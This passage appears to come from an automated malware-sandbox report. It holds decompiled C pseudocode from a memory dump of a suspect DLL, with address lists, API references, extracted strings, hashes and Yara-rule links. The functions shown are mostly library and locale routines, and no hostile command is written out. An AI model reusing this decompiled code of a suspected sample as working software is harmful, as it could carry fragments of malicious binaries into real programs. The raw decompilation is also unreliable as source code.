						_t120 = _t396 + 5; // 0x5
						 *0x6de959dc = 0;
						_t372 = _t120 + _t350;
						 *_t303 =  *_t303 + _t396;
						 *0x6de959d8 = _t372;
						asm("adc [ecx+0x4], eax");
						_t122 = _t396 + 0x3b; // 0x3b
						_t350 = _t122 + _t350 + _t372;
						 *0x6de95a00 = _t350;
					} else {
						_t453 = 0 -  *0x6de95a1c; // 0x0
						if(_t453 != 0) {
							goto L80;
						}
					}
					_t303 = _t303 - 0x10;
				} while (_t303 > 0x6de95a18);
				_t222 =  *0x6de959dc; // 0x5
				_t456 = 0 - _t222;
				if(_t456 >= 0 && (_t456 > 0 || _t350 >= _t372)) {
					_push(0);
					_t354 = _t350 - _t372 * 0x3d - _t396;
					 *0x6de95a58 =  *0x6de95a58 - _t396;
					asm("sbb [0x6de95a5c], eax");
					 *0x6de95a00 = _t354;
					asm("sbb ecx, [0x6de959dc]");
					_t372 = _t354 - _t372 + _t396;
					 *0x6de959d8 = _t372;
					asm("adc ecx, eax");
					 *0x6de959dc = 0;
				}
				_t305 =  *0x6de95a90; // 0x24cf135
				_t306 =  *0x6de959d0; // 0x235275de
				 *0x6de959d0 = _t306 + 0x3d + _t372 + _t305 * 2;
				return E6DDF0075(1);
			}

0x6ddd1285
0x6ddd128c
0x6ddd1291
0x6ddd1297
0x6ddd12a2
0x6ddd12aa
0x6ddd12b2
0x6ddd12b8
0x6ddd12ba
0x6ddd12c0
0x6ddd12c3
0x6ddd12c5
0x6ddd12c8
0x6ddd12cb
0x6ddd12d6
0x6ddd12da
0x6ddd12e0
0x6ddd12ec
0x6ddd12f2
0x6ddd12f9
0x6ddd12ff
0x6ddd1302
0x6ddd1308
0x6ddd130e
0x6ddd1310
0x6ddd1310
0x6ddd131d
0x6ddd1320
0x6ddd1325
0x6ddd1328
0x6ddd132b
0x6ddd132e
0x00000000
0x6ddd1330
0x6ddd1334
0x6ddd1338
0x6ddd133d
0x6ddd133f
0x6ddd134b
0x6ddd134d
0x6ddd1353
0x6ddd1359
0x6ddd1361
0x6ddd1363
0x00000000
0x6ddd1363
0x6ddd1361
0x00000000
0x6ddd1366
0x6ddd1366
0x6ddd1369
0x6ddd136c
0x6ddd1375
0x6ddd1378
0x6ddd137e
0x6ddd1390
0x6ddd1397
0x6ddd1397
0x6ddd1399
0x6ddd139f
0x6ddd13a2
0x6ddd13a4
0x6ddd1380
0x6ddd1380
0x6ddd1386
0x00000000
0x6ddd1388
0x6ddd1388
0x6ddd1388
0x6ddd1386
0x6ddd13bf
0x6ddd13c5
0x6ddd13cb
0x6ddd13d1
0x6ddd13d9
0x6ddd13e1
0x6ddd13e6
0x6ddd13eb
0x6ddd13f2
0x6ddd13f8
0x6ddd13fb
0x6ddd1401
0x6ddd1403
0x00000000
0x6ddd1405
0x6ddd140b
0x6ddd1414
0x6ddd1419
0x6ddd141b
0x6ddd1421
0x6ddd1424
0x6ddd1426
0x6ddd1432
0x6ddd143a
0x6ddd143c
0x6ddd1442
0x00000000
0x6ddd1442
0x6ddd143a
0x00000000
0x6ddd1449
0x6ddd1449
0x6ddd144c
0x6ddd1463
0x6ddd1468
0x6ddd1473
0x6ddd147a
0x6ddd1483
0x6ddd1489
0x6ddd148b
0x6ddd1491
0x6ddd149a
0x6ddd14a3
0x6ddd14a9
0x6ddd14a9
0x6ddd14b7
0x6ddd14bc
0x6ddd14bf
0x6ddd14c4
0x6ddd14c6
0x6ddd14cb
0x6ddd14d0
0x6ddd14d2
0x6ddd14d5
0x6ddd14d8
0x6ddd14df
0x6ddd14e4
0x6ddd14e7
0x6ddd14ec
0x6ddd14f2
0x6ddd14f9
0x6ddd14fa
0x6ddd1501
0x6ddd151c
0x6ddd1526
0x6ddd1526
0x6ddd152c
0x6ddd1503
0x6ddd150a
0x6ddd1514
0x6ddd1514
0x6ddd1531
0x6ddd1536
0x6ddd153b
0x6ddd1544
0x6ddd1545
0x6ddd1545
0x6ddd154b
0x6ddd1551
0x6ddd1558
0x6ddd1578
0x6ddd157e
0x6ddd1586
0x6ddd158b
0x6ddd158b
0x6ddd158d
0x6ddd155a
0x6ddd155a
0x6ddd1565
0x6ddd1570
0x6ddd1570
0x6ddd1593
0x6ddd1594
0x6ddd1595
0x6ddd15bc
0x6ddd15c1
0x6ddd15c7
0x6ddd15cc
0x6ddd15d2
0x6ddd15d8
0x6ddd15e1
0x6ddd15e3
0x6ddd15e6
0x6ddd15e9
0x6ddd15eb
0x6ddd15f5
0x6ddd15f7
0x6ddd15fa
0x6ddd15fa
0x6ddd15fc
0x6ddd15ff
0x6ddd1607
0x6ddd160c
0x6ddd1612
0x6ddd1618
0x6ddd1620
0x6ddd1623
0x6ddd1629
0x6ddd1644
0x6ddd164e
0x6ddd1654
0x6ddd162b
0x6ddd162b
0x6ddd1631
0x00000000
0x6ddd1633
0x6ddd1633
0x6ddd163d
0x6ddd163d
0x6ddd1631
0x6ddd1664
0x6ddd1667
0x6ddd166a
0x6ddd166f
0x6ddd1671
0x6ddd1674
0x6ddd167b
0x6ddd167e
0x6ddd1683
0x6ddd168a
0x6ddd168f
0x6ddd1695
0x6ddd169c
0x6ddd169d
0x6ddd16a2
0x6ddd16a5
0x6ddd16aa
0x6ddd16ac
0x6ddd16b6
0x6ddd16bb
0x6ddd16bd
0x6ddd16c0
0x6ddd16c3
0x6ddd16c8
0x6ddd16cd
0x6ddd16d4
0x6ddd16d9
0x6ddd16df
0x6ddd16eb
0x6ddd16f6
0x6ddd16f9
0x6ddd1707
0x6ddd170e
0x6ddd1715
0x6ddd171a
0x6ddd1720
0x6ddd1725
0x6ddd172e
0x6ddd1733
0x6ddd1737
0x6ddd173e
0x6ddd1748
0x6ddd174a
0x6ddd174d
0x6ddd1753
0x6ddd1755
0x6ddd1758
0x6ddd175d
0x6ddd1763
0x00000000
0x6ddd1765
0x6ddd1765
0x6ddd176b
0x00000000
0x00000000
0x6ddd176b
0x6ddd1740
0x6ddd1740
0x6ddd1746
0x00000000
0x00000000
0x00000000
0x00000000
0x6ddd1746
0x00000000
0x6ddd176d
0x6ddd176d
0x6ddd1770
0x6ddd177a
0x6ddd177f
0x6ddd1785
0x6ddd178d
0x6ddd1790
0x6ddd1793
0x6ddd1799
0x6ddd17a2
0x6ddd17ad
0x6ddd17b4
0x6ddd17b7
0x6ddd17c3
0x6ddd17c6
0x6ddd17cc
0x6ddd17e9
0x6ddd17f0
0x6ddd17f0
0x6ddd17f3
0x6ddd17f6
0x6ddd17f8
0x6ddd17ce
0x6ddd17d1
0x6ddd17d9
0x6ddd17e4
0x6ddd17e4
0x6ddd17fe
0x6ddd1801
0x6ddd1806
0x6ddd1809
0x6ddd180c
0x6ddd180f
0x6ddd1812
0x6ddd1878
0x00000000
0x6ddd1814
0x6ddd181b
0x6ddd181f
0x6ddd1824
0x6ddd1827
0x6ddd1830
0x6ddd1836
0x6ddd1838
0x6ddd1840
0x6ddd1842
0x00000000
0x6ddd1842
0x6ddd1840
0x00000000
0x6ddd1845
0x6ddd1845
0x6ddd1848
0x6ddd184b
0x6ddd1854
0x6ddd1855
0x6ddd1858
0x6ddd185b
0x6ddd1861
0x6ddd187d
0x6ddd1884
0x6ddd1889
0x6ddd1889
0x6ddd188c
0x6ddd188e
0x6ddd1863
0x6ddd1865
0x6ddd186b
0x00000000
0x6ddd186d
0x6ddd186d
0x6ddd1870
0x6ddd1870
0x6ddd1870
0x6ddd186b
0x6ddd1891
0x6ddd1897
0x6ddd18b1
0x6ddd1899
0x6ddd1899
0x6ddd18a5
0x6ddd18a7
0x6ddd18ad
0x6ddd18ad
0x6ddd18b6
0x6ddd18c2
0x6ddd18c5
0x6ddd18c7
0x6ddd18ca
0x6ddd18cc
0x6ddd18d2
0x6ddd18d8
0x6ddd18e1
0x6ddd18e6
0x6ddd18e9
0x6ddd18eb
0x6ddd18ed
0x6ddd18f3
0x6ddd18f6
0x6ddd18fb
0x6ddd18fe
0x6ddd1900
0x6ddd1906
0x6ddd1906
0x6ddd190f
0x6ddd1912
0x6ddd1915
0x6ddd191c
0x6ddd191f
0x6ddd1924
0x6ddd1927
0x6ddd192e
0x6ddd1931
0x6ddd1931
0x6ddd1935
0x00000000
0x6ddd1937
0x6ddd1941
0x6ddd1944
0x6ddd1946
0x6ddd1955
0x6ddd1957
0x6ddd195a
0x00000000
0x6ddd195a
0x6ddd1955
0x00000000
0x6ddd1961
0x6ddd1961
0x6ddd1964
0x6ddd1967
0x6ddd196e
0x6ddd1975
0x6ddd197a
0x6ddd197f
0x6ddd1985
0x6ddd1988
0x6ddd198a
0x6ddd198f
0x6ddd1993
0x6ddd1995
0x6ddd1998
0x6ddd199f
0x6ddd199f
0x6ddd19a1
0x6ddd19a9
0x6ddd19ab
0x6ddd19b1
0x6ddd19b8
0x6ddd19eb
0x6ddd19ba
0x6ddd19c4
0x6ddd19c9
0x6ddd19d2
0x6ddd19d5
0x6ddd19d7
0x6ddd19dd
0x6ddd19e3
0x6ddd19e3
0x6ddd19ee
0x6ddd19f3
0x6ddd19fc
0x6ddd19fe
0x6ddd1a01
0x6ddd1a04
0x6ddd1a04
0x6ddd1a07
0x6ddd1a0a
0x6ddd1a0a
0x6ddd1a0c
0x6ddd1a0f
0x6ddd1a11
0x6ddd1a19
0x6ddd1a1e
0x6ddd1a1f
0x6ddd1a25
0x6ddd1a2c
0x6ddd1a31
0x6ddd1a31
0x6ddd1a33
0x6ddd1a33
0x6ddd1a39
0x6ddd1a41
0x6ddd1a46
0x6ddd1a4b
0x6ddd1a51
0x6ddd1a56
0x6ddd1a5c
0x6ddd1a5e
0x6ddd1a64
0x6ddd1a6e
0x6ddd1a6e
0x6ddd1a71
0x6ddd1a76
0x6ddd1a78
0x6ddd1a7a
0x6ddd1a80
0x6ddd1a86
0x6ddd1a89
0x6ddd1a8b
0x6ddd1a66
0x6ddd1a66
0x6ddd1a6c
0x00000000
0x00000000
0x6ddd1a6c
0x6ddd1a91
0x6ddd1a94
0x6ddd1a9c
0x6ddd1aa3
0x6ddd1aa5
0x6ddd1ab0
0x6ddd1ab4
0x6ddd1ab6
0x6ddd1abd
0x6ddd1ac5
0x6ddd1acf
0x6ddd1ad5
0x6ddd1ad7
0x6ddd1add
0x6ddd1adf
0x6ddd1adf
0x6ddd1ae5
0x6ddd1af0
0x6ddd1afc
0x6ddd1b07

APIs

__EH_prolog3.LIBCMT ref: 6DDD128C
GetSystemDirectoryA.KERNEL32 ref: 6DDD13C5
GetTempPathA.KERNEL32(0000056D,C:\Users\user\AppData\Local\Temp\,?,6DDEFF71,?,00000001,?,?,00000001,?,6DE927E0,0000000C,6DDF006E,?,00000001,?), ref: 6DDD1468

Strings

DZm, xrefs: 6DDD136C
cd Island, xrefs: 6DDD1531
DZm, xrefs: 6DDD1967
C:\Users\user\AppData\Local\Temp\, xrefs: 6DDD1459
Ym, xrefs: 6DDD13E1
Ym, xrefs: 6DDD1320
Ym, xrefs: 6DDD1801
C:\Windows\system32, xrefs: 6DDD13B2
6623, xrefs: 6DDD16B1
Ym, xrefs: 6DDD191F
part , xrefs: 6DDD15B5
Ym, xrefs: 6DDD15FF
cd Matter m, xrefs: 6DDD1607
Ym, xrefs: 6DDD1915
DZm, xrefs: 6DDD144C
Had s, xrefs: 6DDD14DF
6265, xrefs: 6DDD14CB
(Zm, xrefs: 6DDD170E
Ym, xrefs: 6DDD1A11
DZm, xrefs: 6DDD184B
Molecul, xrefs: 6DDD167E
out drop , xrefs: 6DDD16C8

Memory Dump Source

Source File: 00000000.00000002.568139486.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000000.00000002.567135782.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.596199111.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.608518190.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.609706769.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610220654.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: DirectoryH_prolog3PathSystemTemp
String ID: (Zm$6265$6623$C:\Users\user\AppData\Local\Temp\$C:\Windows\system32$DZm$DZm$DZm$DZm$Had s$Molecul$cd Island$cd Matter m$out drop $part $Ym$Ym$Ym$Ym$Ym$Ym$Ym
API String ID: 3607090873-3565667238
Opcode ID: 5ebb9fc268858b5886ac1240e99395b6a989460ad7e8762d08975ef75caaf86f
Instruction ID: 94e23ca78b422213e21c6e45ee0ab784bc41335f6660cb7dcd6b8837380bd96d
Opcode Fuzzy Hash: 5ebb9fc268858b5886ac1240e99395b6a989460ad7e8762d08975ef75caaf86f
Instruction Fuzzy Hash: DA3278B1A02612CFDF08DF78C89167977F1FB8A322B25812BE429DF681E7749841CB54

Uniqueness

Uniqueness Score: -1.00%

Function 6DDD4A80, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E6DDD4A80(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t23;
				intOrPtr* _t24;
				void* _t29;
				intOrPtr* _t57;
				intOrPtr* _t60;
				void* _t61;

				_t44 = __ebx;
				E6DDF00AC(0x6de38144, __ebx, __edi, __esi, 0x14);
				E6DDD6653(_t61 - 0x14, 0);
				 *(_t61 - 4) =  *(_t61 - 4) & 0x00000000;
				_t57 =  *0x6deace80; // 0x1535600
				 *((intOrPtr*)(_t61 - 0x10)) = _t57;
				_t23 = E6DDB161C(0x6de96b34);
				_t47 =  *((intOrPtr*)(_t61 + 8));
				_t24 = E6DDB171B( *((intOrPtr*)(_t61 + 8)), _t23);
				_t59 = _t24;
				if(_t24 != 0) {
					L5:
					E6DDD66BA(_t61 - 0x14);
					return E6DDF0075(_t59);
				} else {
					if(_t57 == 0) {
						_push( *((intOrPtr*)(_t61 + 8)));
						_push(_t61 - 0x10); // executed
						_t29 = E6DDB18A0(__ebx, _t47, __edx, _t57, _t59); // executed
						__eflags = _t29 - 0xffffffff;
						if(__eflags == 0) {
							E6DDB1438(_t61 - 0x20);
							E6DDF3D74(_t61 - 0x20, 0x6de93504);
							asm("int3");
							E6DDF00AC(0x6de38192, __ebx, _t57, _t59, 0xc);
							_t60 = E6DDD4A32(_t44, _t57, _t59, 8);
							 *((intOrPtr*)(_t61 - 0x18)) = _t61 - 0xd;
							 *((intOrPtr*)(_t61 - 0x14)) = _t60;
							__eflags = 0;
							 *(_t61 - 4) = 0;
							 *_t60 = 0;
							 *((intOrPtr*)(_t60 + 4)) = 0;
							 *_t60 = E6DDD5BFB();
							return E6DDF0075(_t60);
						} else {
							_t59 =  *((intOrPtr*)(_t61 - 0x10));
							 *((intOrPtr*)(_t61 - 0x10)) = _t59;
							 *(_t61 - 4) = 1;
							E6DDD6FD3(__eflags, _t59);
							 *((intOrPtr*)( *_t59 + 4))();
							 *0x6deace80 = _t59;
							goto L5;
						}
					} else {
						_t59 = _t57;
						goto L5;
					}
				}
			}

0x6ddd4a80
0x6ddd4a87
0x6ddd4a91
0x6ddd4a96
0x6ddd4a9f
0x6ddd4aa5
0x6ddd4aa8
0x6ddd4aad
0x6ddd4ab1
0x6ddd4ab6
0x6ddd4aba
0x6ddd4af5
0x6ddd4af8
0x6ddd4b04
0x6ddd4abc
0x6ddd4abe
0x6ddd4ac4
0x6ddd4aca
0x6ddd4acb
0x6ddd4ad2
0x6ddd4ad5
0x6ddd4b08
0x6ddd4b16
0x6ddd4b1b
0x6ddd4b23
0x6ddd4b2f
0x6ddd4b35
0x6ddd4b38
0x6ddd4b3b
0x6ddd4b3d
0x6ddd4b40
0x6ddd4b42
0x6ddd4b4a
0x6ddd4b53
0x6ddd4ad7
0x6ddd4ad7
0x6ddd4ada
0x6ddd4ade
0x6ddd4ae2
0x6ddd4aec
0x6ddd4aef
0x00000000
0x6ddd4aef
0x6ddd4ac0
0x6ddd4ac0
0x00000000
0x6ddd4ac0
0x6ddd4abe

APIs

__EH_prolog3.LIBCMT ref: 6DDD4A87
std::_Lockit::_Lockit.LIBCPMT ref: 6DDD4A91
int.LIBCPMT ref: 6DDD4AA8

Part of subcall function 6DDB161C: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB162D
Part of subcall function 6DDB161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDB1647

std::_Facet_Register.LIBCPMT ref: 6DDD4AE2
std::_Lockit::~_Lockit.LIBCPMT ref: 6DDD4AF8
__CxxThrowException@8.LIBVCRUNTIME ref: 6DDD4B16

Strings

4km, xrefs: 6DDD4A9A

Memory Dump Source

Source File: 00000000.00000002.568139486.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000000.00000002.567135782.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.596199111.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.608518190.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.609706769.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610220654.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID: 4km
API String ID: 651022567-3804071703
Opcode ID: 4dd3f244ff24e84071d52a1992eaaaf1fd28732f779572d21d96b7ebc24ab3c7
Instruction ID: 481c63c3416ee030420c5208cba10d68e514b425c0fdeef0a988df0856473742
Opcode Fuzzy Hash: 4dd3f244ff24e84071d52a1992eaaaf1fd28732f779572d21d96b7ebc24ab3c7
Instruction Fuzzy Hash: A711CEB590822ADBCF00FBA4C840AFD7774AF18318F260508F611AB290EF709A05CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6DE1E506, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 187
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E6DE1E506(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int _v56;
				char _v276;
				short _v278;
				short _v280;
				char _v448;
				signed int _v452;
				signed int _v456;
				short _v458;
				intOrPtr _v460;
				intOrPtr _v464;
				signed int _v468;
				signed int _v472;
				intOrPtr _v508;
				char _v536;
				signed int _v540;
				intOrPtr _v544;
				signed int _v556;
				char _v708;
				signed int _v712;
				signed int _v716;
				short _v718;
				signed int* _v720;
				signed int _v724;
				signed int _v728;
				signed int _v732;
				signed int* _v736;
				signed int _v740;
				signed int _v744;
				signed int _v748;
				signed int _v752;
				char _v820;
				char _v1248;
				char _v1256;
				intOrPtr _v1276;
				signed int _v1292;
				signed int _t241;
				signed int _t243;
				void* _t246;
				signed int _t249;
				signed int _t251;
				signed int _t257;
				signed int _t258;
				signed int _t259;
				signed int _t260;
				signed int _t261;
				signed int _t263;
				signed int _t265;
				void* _t267;
				signed int _t268;
				signed int _t269;
				signed int _t270;
				signed int _t272;
				signed int _t275;
				signed int _t282;
				signed int _t283;
				signed int _t284;
				intOrPtr _t285;
				signed int _t288;
				signed int _t292;
				signed int _t293;
				intOrPtr* _t295;
				intOrPtr _t296;
				signed int _t299;
				signed int _t300;
				signed int _t302;
				signed int _t322;
				signed int _t323;
				signed int _t326;
				signed int _t331;
				void* _t333;
				signed int _t335;
				void* _t336;
				intOrPtr _t337;
				signed int _t342;
				signed int _t343;
				intOrPtr* _t346;
				signed int _t360;
				signed int _t362;
				signed int _t364;
				intOrPtr* _t365;
				signed int _t367;
				signed int _t373;
				intOrPtr* _t377;
				intOrPtr* _t380;
				void* _t383;
				signed int _t384;
				intOrPtr* _t385;
				signed int _t398;
				signed int _t401;
				intOrPtr* _t402;
				signed int _t404;
				signed int* _t408;
				intOrPtr* _t415;
				intOrPtr* _t416;
				intOrPtr _t425;
				signed int _t426;
				short _t427;
				signed int _t430;
				intOrPtr _t431;
				signed int _t434;
				intOrPtr _t435;
				signed int _t437;
				signed int _t440;
				intOrPtr _t446;
				signed int _t447;
				void* _t448;
				signed int _t449;
				signed int _t450;
				signed int _t453;
				signed int _t455;
				void* _t456;
				signed int _t459;
				signed int* _t460;
				intOrPtr* _t461;
				short _t462;
				void* _t464;
				signed int _t466;
				signed int _t468;
				void* _t470;
				void* _t471;
				void* _t473;
				signed int _t474;
				void* _t475;
				void* _t477;
				signed int _t478;
				void* _t480;
				void* _t482;
				intOrPtr _t494;

				_t425 = __edx;
				_t464 = _t470;
				_t471 = _t470 - 0xc;
				_push(__ebx);
				_push(__esi);
				_v12 = 1;
				_t241 = E6DE1F26D(__ecx, 0x6a6); // executed
				_t360 = _t241;
				_t242 = 0;
				_pop(_t373);
				if(_t360 == 0) {
					L20:
					return _t242;
				} else {
					_push(__edi);
					_t2 = _t360 + 4; // 0x4
					_t430 = _t2;
					 *_t430 = 0;
					 *_t360 = 1;
					_t446 = _a4;
					_t4 = _t446 + 0x30; // 0x6de1da4e
					_t243 = _t4;
					_push( *_t243);
					_v16 = _t243;
					_push(0x6de40f34);
					_push( *0x6de40dec);
					E6DE1E445(_t360, _t373, _t430, _t446, _t430, 0x351, 3);
					_t473 = _t471 + 0x18;
					_v8 = 0x6de40dec;
					while(1) {
						L2:
						_t246 = E6DE2D470(_t430, 0x351, 0x6de40f30);
						_t474 = _t473 + 0xc;
						if(_t246 != 0) {
							break;
						} else {
							_t8 = _v16 + 0x10; // 0x10
							_t415 = _t8;
							_t342 =  *_v16;
							_v16 = _t415;
							_t416 =  *_t415;
							goto L4;
						}
						while(1) {
							L4:
							_t425 =  *_t342;
							if(_t425 !=  *_t416) {
								break;
							}
							if(_t425 == 0) {
								L8:
								_t343 = 0;
							} else {
								_t425 =  *((intOrPtr*)(_t342 + 2));
								if(_t425 !=  *((intOrPtr*)(_t416 + 2))) {
									break;
								} else {
									_t342 = _t342 + 4;
									_t416 = _t416 + 4;
									if(_t425 != 0) {
										continue;
									} else {
										goto L8;
									}
								}
							}
							L10:
							asm("sbb eax, eax");
							_t373 = _v8 + 0xc;
							_v8 = _t373;
							_v12 = _v12 &  !( ~_t343);
							_t346 = _v16;
							_v16 = _t346;
							_push( *_t346);
							_push(0x6de40f34);
							_push( *_t373);
							E6DE1E445(_t360, _t373, _t430, _t446, _t430, 0x351, 3);
							_t473 = _t474 + 0x18;
							if(_v8 < 0x6de40e1c) {
								goto L2;
							} else {
								if(_v12 != 0) {
									E6DE1CBD3(_t360);
									_t31 = _t446 + 0x28; // 0x10468b00
									_t437 = _t430 | 0xffffffff;
									__eflags =  *_t31;
									if(__eflags != 0) {
										asm("lock xadd [ecx], eax");
										if(__eflags == 0) {
											_t32 = _t446 + 0x28; // 0x10468b00
											E6DE1CBD3( *_t32);
										}
									}
									_t33 = _t446 + 0x24; // 0x3b8e8
									__eflags =  *_t33;
									if( *_t33 != 0) {
										asm("lock xadd [eax], edi");
										__eflags = _t437 == 1;
										if(_t437 == 1) {
											_t34 = _t446 + 0x24; // 0x3b8e8
											E6DE1CBD3( *_t34);
										}
									}
									 *(_t446 + 0x24) = 0;
									 *(_t446 + 0x1c) = 0;
									 *(_t446 + 0x28) = 0;
									 *((intOrPtr*)(_t446 + 0x20)) = 0;
									_t39 = _t446 + 0x40; // 0x18914c4
									_t242 =  *_t39;
								} else {
									_t20 = _t446 + 0x28; // 0x10468b00
									_t440 = _t430 | 0xffffffff;
									_t494 =  *_t20;
									if(_t494 != 0) {
										asm("lock xadd [ecx], eax");
										if(_t494 == 0) {
											_t21 = _t446 + 0x28; // 0x10468b00
											E6DE1CBD3( *_t21);
										}
									}
									_t22 = _t446 + 0x24; // 0x3b8e8
									if( *_t22 != 0) {
										asm("lock xadd [eax], edi");
										if(_t440 == 1) {
											_t23 = _t446 + 0x24; // 0x3b8e8
											E6DE1CBD3( *_t23);
										}
									}
									 *(_t446 + 0x24) =  *(_t446 + 0x24) & 0x00000000;
									_t26 = _t360 + 4; // 0x4
									_t242 = _t26;
									 *(_t446 + 0x1c) =  *(_t446 + 0x1c) & 0x00000000;
									 *(_t446 + 0x28) = _t360;
									 *((intOrPtr*)(_t446 + 0x20)) = _t242;
								}
								goto L20;
							}
							goto L131;
						}
						asm("sbb eax, eax");
						_t343 = _t342 | 0x00000001;
						__eflags = _t343;
						goto L10;
					}
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E6DE12188();
					asm("int3");
					_push(_t464);
					_t466 = _t474;
					_t475 = _t474 - 0x1d0;
					_t249 =  *0x6de9506c; // 0x20895150
					_v56 = _t249 ^ _t466;
					_t251 = _v40;
					_push(_t360);
					_push(_t446);
					_t447 = _v36;
					_push(_t430);
					_t431 = _v44;
					_v508 = _t431;
					__eflags = _t251;
					if(_t251 == 0) {
						_v456 = 1;
						_v468 = 0;
						_t362 = 0;
						_v452 = 0;
						__eflags = _t447;
						if(__eflags == 0) {
							L80:
							E6DE1E506(_t362, _t373, _t425, _t431, _t447, __eflags, _t431); // executed
							goto L81;
						} else {
							__eflags =  *_t447 - 0x4c;
							if( *_t447 != 0x4c) {
								L59:
								_t257 = E6DE1DE92(_t362, _t425, _t431, _t447, _t447,  &_v276, 0x83,  &_v448, 0x55, 0);
								_t477 = _t475 + 0x18;
								__eflags = _t257;
								if(_t257 != 0) {
									_t373 = 0;
									__eflags = 0;
									_t76 = _t431 + 0x20; // 0x6de1da3e
									_t426 = _t76;
									_t449 = 0;
									_v452 = _t426;
									do {
										__eflags = _t449;
										if(_t449 == 0) {
											L74:
											_t258 = _v456;
										} else {
											_t377 =  *_t426;
											_t259 =  &_v276;
											while(1) {
												__eflags =  *_t259 -  *_t377;
												_t431 = _v464;
												if( *_t259 !=  *_t377) {
													break;
												}
												__eflags =  *_t259;
												if( *_t259 == 0) {
													L67:
													_t373 = 0;
													_t260 = 0;
												} else {
													_t427 =  *((intOrPtr*)(_t259 + 2));
													__eflags = _t427 -  *((intOrPtr*)(_t377 + 2));
													_v458 = _t427;
													_t426 = _v452;
													if(_t427 !=  *((intOrPtr*)(_t377 + 2))) {
														break;
													} else {
														_t259 = _t259 + 4;
														_t377 = _t377 + 4;
														__eflags = _v458;
														if(_v458 != 0) {
															continue;
														} else {
															goto L67;
														}
													}
												}
												L69:
												__eflags = _t260;
												if(_t260 == 0) {
													_t362 = _t362 + 1;
													__eflags = _t362;
													goto L74;
												} else {
													_t261 =  &_v276;
													_push(_t261);
													_push(_t449);
													_push(_t431);
													L84();
													_t426 = _v452;
													_t477 = _t477 + 0xc;
													__eflags = _t261;
													if(_t261 == 0) {
														_t373 = 0;
														_t258 = 0;
														_v456 = 0;
													} else {
														_t362 = _t362 + 1;
														_t373 = 0;
														goto L74;
													}
												}
												goto L75;
											}
											asm("sbb eax, eax");
											_t260 = _t259 | 0x00000001;
											_t373 = 0;
											__eflags = 0;
											goto L69;
										}
										L75:
										_t449 = _t449 + 1;
										_t426 = _t426 + 0x10;
										_v452 = _t426;
										__eflags = _t449 - 5;
									} while (_t449 <= 5);
									__eflags = _t258;
									if(__eflags != 0) {
										goto L80;
									} else {
										__eflags = _t362;
										goto L78;
									}
								}
								goto L81;
							} else {
								__eflags =  *(_t447 + 2) - 0x43;
								if( *(_t447 + 2) != 0x43) {
									goto L59;
								} else {
									__eflags =  *((short*)(_t447 + 4)) - 0x5f;
									if( *((short*)(_t447 + 4)) != 0x5f) {
										goto L59;
									} else {
										while(1) {
											_t263 = E6DE2D60D(_t447, 0x6de40f28);
											_t364 = _t263;
											_v472 = _t364;
											_pop(_t379);
											__eflags = _t364;
											if(_t364 == 0) {
												break;
											}
											_t265 = _t263 - _t447;
											__eflags = _t265;
											_v456 = _t265 >> 1;
											if(_t265 == 0) {
												break;
											} else {
												_t267 = 0x3b;
												__eflags =  *_t364 - _t267;
												if( *_t364 == _t267) {
													break;
												} else {
													_t434 = _v456;
													_t365 = 0x6de40dec;
													_v460 = 1;
													do {
														_t268 = E6DE1ABBA( *_t365, _t447, _t434);
														_t475 = _t475 + 0xc;
														__eflags = _t268;
														if(_t268 != 0) {
															goto L46;
														} else {
															_t380 =  *_t365;
															_t425 = _t380 + 2;
															do {
																_t337 =  *_t380;
																_t380 = _t380 + 2;
																__eflags = _t337 - _v468;
															} while (_t337 != _v468);
															_t379 = _t380 - _t425 >> 1;
															__eflags = _t434 - _t380 - _t425 >> 1;
															if(_t434 != _t380 - _t425 >> 1) {
																goto L46;
															}
														}
														break;
														L46:
														_v460 = _v460 + 1;
														_t365 = _t365 + 0xc;
														__eflags = _t365 - 0x6de40e1c;
													} while (_t365 <= 0x6de40e1c);
													_t362 = _v472 + 2;
													_t269 = E6DE2D5BD(_t379, _t362, 0x6de40f30);
													_t431 = _v464;
													_t450 = _t269;
													_pop(_t383);
													__eflags = _t450;
													if(_t450 != 0) {
														L49:
														__eflags = _v460 - 5;
														if(_v460 > 5) {
															_t270 = _v452;
															goto L55;
														} else {
															_push(_t450);
															_t272 = E6DE2D5B2(_t383,  &_v276, 0x83, _t362);
															_t478 = _t475 + 0x10;
															__eflags = _t272;
															if(_t272 != 0) {
																L83:
																_push(0);
																_push(0);
																_push(0);
																_push(0);
																_push(0);
																E6DE12188();
																asm("int3");
																_push(_t466);
																_t468 = _t478;
																_t275 =  *0x6de9506c; // 0x20895150
																_v556 = _t275 ^ _t468;
																_push(_t362);
																_t367 = _v540;
																_push(_t450);
																_push(_t431);
																_t435 = _v544;
																_v1292 = _t367;
																_v1276 = E6DE1D5FF(_t367, _t383, _t425) + 0x278;
																_t282 = E6DE1DE92(_t367, _t425, _t435, _v536, _v536,  &_v820, 0x83,  &_v1248, 0x55,  &_v1256);
																_t480 = _t478 - 0x2e4 + 0x18;
